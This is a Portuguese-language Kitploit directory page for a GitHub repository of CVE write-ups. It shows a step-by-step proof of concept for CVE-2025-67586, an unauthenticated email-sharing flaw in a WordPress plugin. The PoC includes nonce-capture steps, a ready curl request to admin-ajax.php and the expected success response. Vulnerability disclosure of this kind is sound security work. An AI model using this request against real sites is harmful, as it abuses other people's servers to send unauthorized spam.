Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE — writeups for (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986) | Kitploit
Ferramentas/GitHubGitHub/r0xtsec/cve
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubr0xtsec/cve

CVE

writeups for (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)

Ver Repositório
há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE

Relatórios para (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)

root@kitploit:~
--------------   CVE-2025-67586 Exploit PoC   --------------
  • Título do Exploit: WordPress Plugin 5.2.0 - Controle de Acesso Quebrado
  • Link do Software: https://wordpress.org/plugins/highlight-and-share/
  • Versão: <= 5.2.0 (OBRIGATÓRIO)
  • CVE: CVE-2025-67586

==> Descrição Uma vulnerabilidade de controle de acesso quebrado existe em um plugin WordPress desenvolvido por DLX Plugins. O plugin expõe uma ação AJAX não autenticada que permite que atacantes abusem da funcionalidade "Compartilhar por E-mail" sem as devidas verificações de permissão.

Um atacante não autenticado pode reutilizar um nonce de post válido para disparar solicitações de compartilhamento por e-mail, resultando em envio não autorizado de e-mails (spam / abuso de e-mail) sem autenticação do usuário.

==> Privilégios Necessários Nenhum (Não autenticado)

==> Prova de Conceito (PoC)

Etapa 1: Escolha um site com o Plugin Instalado

Etapa 2: Obter um Nonce Válido

  1. Abra um post público.
  2. Destaque o texto e clique em Compartilhar por E-mail.
  3. Abra as Ferramentas do Desenvolvedor → Rede → XHR.
  4. Envie o e-mail uma vez.
  5. Capture a requisição contendo: action=has_email_social_modal nonce= post_id=

Etapa 3: Explorar via Requisição Não Autenticada

comando bash: (substitua a URL do site, a URL do post e o nonce)

curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php'
-d 'action=has_email_form_submission'
-d 'formData[postId]='
-d 'formData[permalink]=http://localhost/?p='
-d 'formData[nonce]='
-d 'formData[toEmail]=[email protected]'
-d 'formData[subject]=PoC'
-d 'formData[shareText]=POC test'
-d 'formData[emailShareType]=selection'
--compressed

--> Resposta JSON esperada:

{ "success": true, "data": { "errors": false, "message_title": "This post has been shared!", "message_body": "You have shared this post with [email protected]", "message_subject": "[Shared Post] ", "message_source_name": "Site Name", "message_source_email": "[email protected]" } }

Baixar ferramenta